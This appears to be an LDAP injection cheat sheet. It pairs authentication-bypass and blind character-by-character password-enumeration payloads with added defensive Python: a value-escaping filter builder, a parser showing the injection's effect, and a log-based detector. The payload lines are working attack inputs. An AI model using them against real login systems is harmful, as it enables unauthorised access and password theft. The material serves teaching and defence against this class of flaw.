LDAP Injections

Basic LDAP Injection

# Classical request : (&(uid=)(userPassword=))
# So the result is TRUE only if both uid AND userPassword match
# You can put ')' in the request to trigger an error and see the request

username : *)(|(uid=*
password : )(&(uid=*)(|(uid=*)(userPassword=)))

OR

username=*
password=*)(&(&(uid=*)(userPassword=*)(&))
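
Added example (not part of the original cheat sheet): the login filter described above, built once by plain concatenation and once with the assertion values escaped per RFC 4515, plus a minimal filter parser so the structural effect of the injected characters is visible. The attribute names uid and userPassword come from the page; the function names, the parser and the parsed-tree shape are assumptions of this example.

```python
# Added example, not from the original cheat sheet: a vulnerable filter builder
# beside an escaping one, and a small parser to compare what each produces.

# RFC 4515 section 3: these characters must be hex-escaped inside a value.
_FILTER_ESCAPES = {
    "\\": "\\5c",
    "*": "\\2a",
    "(": "\\28",
    ")": "\\29",
    "\x00": "\\00",
}


def escape_filter_value(value: str) -> str:
    """Escape a string for use as an assertion value in an LDAP search filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username: str, password: str) -> str:
    """Vulnerable: user input is concatenated directly into the filter."""
    return f"(&(uid={username})(userPassword={password}))"


def build_login_filter_safe(username: str, password: str) -> str:
    """Hardened: every user-controlled value is escaped before insertion."""
    return (
        f"(&(uid={escape_filter_value(username)})"
        f"(userPassword={escape_filter_value(password)}))"
    )


def _parse(s: str, i: int):
    """Recursive-descent parser for the subset of RFC 4515 needed here:
    and/or/not lists and simple 'attr=value' items. Returns (node, next_index)."""
    if i >= len(s) or s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    c = s[i] if i < len(s) else ""
    if c in ("&", "|"):
        i += 1
        children = []
        while i < len(s) and s[i] == "(":
            child, i = _parse(s, i)
            children.append(child)
        if i >= len(s) or s[i] != ")":
            raise ValueError(f"unterminated '{c}' list at offset {i}")
        return (c, children), i + 1
    if c == "!":
        child, i = _parse(s, i + 1)
        if i >= len(s) or s[i] != ")":
            raise ValueError(f"unterminated '!' at offset {i}")
        return ("!", [child]), i + 1
    # Simple item: a literal ')' inside a value must be escaped as \29, so the
    # first ')' we see closes the item.
    end = s.find(")", i)
    if end == -1:
        raise ValueError(f"unterminated item at offset {i}")
    attr, _, value = s[i:end].partition("=")
    return ("=", attr, value), end + 1


def parse_filter(s: str):
    """Parse a complete filter; returns (tree, trailing_text)."""
    tree, i = _parse(s, 0)
    return tree, s[i:]


if __name__ == "__main__":
    # Constructed input: the first username/password pair listed on the page.
    user, pwd = "*)(|(uid=*", ")(&(uid=*)(|(uid=*)(userPassword=)))"
    for label, f in (("unsafe", build_login_filter_unsafe(user, pwd)),
                     ("safe", build_login_filter_safe(user, pwd))):
        tree, rest = parse_filter(f)
        print(label, f)
        print("  parsed:", tree, "trailing:", repr(rest))
```

With the page's first payload, the unsafe build parses to an and-list whose second term is an injected or-list, so the filter no longer expresses "uid AND userPassword". The escaped build parses to exactly two equality items whose values are the literal input strings. Escaping is the minimum fix; checking credentials with an LDAP bind as the user instead of a filter compare on userPassword avoids putting the password into a filter at all.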

Blind LDAP Injection

# You have to work out (or guess) how the request is built

# test using only a char → OK → request is (mail=*[text]*)
# You can try (mail=*)(sn=*) → )(sn= → OK
# Then, the password attribute (mail=*)(password=*) → OK

@*)(password=x → FALSE
@*)(password=d → TRUE

# You can then enumerate each char
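
Added example (not part of the original cheat sheet), from the detection side: the char-by-char enumeration above shows up as a burst of requests from one client whose input field carries filter metacharacters and differs only in the trailing character. The log format, the sample lines and the function names are constructed for this example; the `@*)(password=` prefix is the page's own payload shape.

```python
# Added example, not from the original cheat sheet: flag clients that send
# repeated inputs containing LDAP filter metacharacters, the footprint of
# blind enumeration. Log format and sample lines are constructed.
import re
from collections import defaultdict

# Constructed format: "<timestamp> <client_ip> login user=<value>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) login user=(?P<user>.*)$")

# Characters with structural meaning in an RFC 4515 filter; a normal login
# name should not contain any of them.
META_RE = re.compile(r"[()*\\\x00]")

# Constructed sample: one ordinary user and one client walking the password.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 10.0.0.5 login user=alice
2024-01-01T10:00:01Z 10.0.0.9 login user=@*)(password=x
2024-01-01T10:00:02Z 10.0.0.9 login user=@*)(password=d
2024-01-01T10:00:03Z 10.0.0.5 login user=bob
2024-01-01T10:00:04Z 10.0.0.9 login user=@*)(password=da
2024-01-01T10:00:05Z 10.0.0.9 login user=@*)(password=db
""".splitlines()


def parse_log_line(line: str):
    """Return (ip, user) for a matching line, or None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("user")


def find_injection_attempts(lines, threshold: int = 3):
    """Map client ip -> list of metacharacter-bearing inputs, kept only for
    clients at or above `threshold` such inputs (a single odd value is noise)."""
    suspicious = defaultdict(list)
    for line in lines:
        parsed = parse_log_line(line)
        if parsed is None:
            continue
        ip, user = parsed
        if META_RE.search(user):
            suspicious[ip].append(user)
    return {ip: users for ip, users in suspicious.items() if len(users) >= threshold}


if __name__ == "__main__":
    for ip, users in find_injection_attempts(SAMPLE_LOG).items():
        print(f"{ip}: {len(users)} requests with filter metacharacters")
        for u in users:
            print("   ", u)
```

The threshold keeps a single typo from raising an alert; in practice the same rule applies to whichever field feeds the filter (mail, uid, cn), and the count per client is what distinguishes enumeration from a one-off.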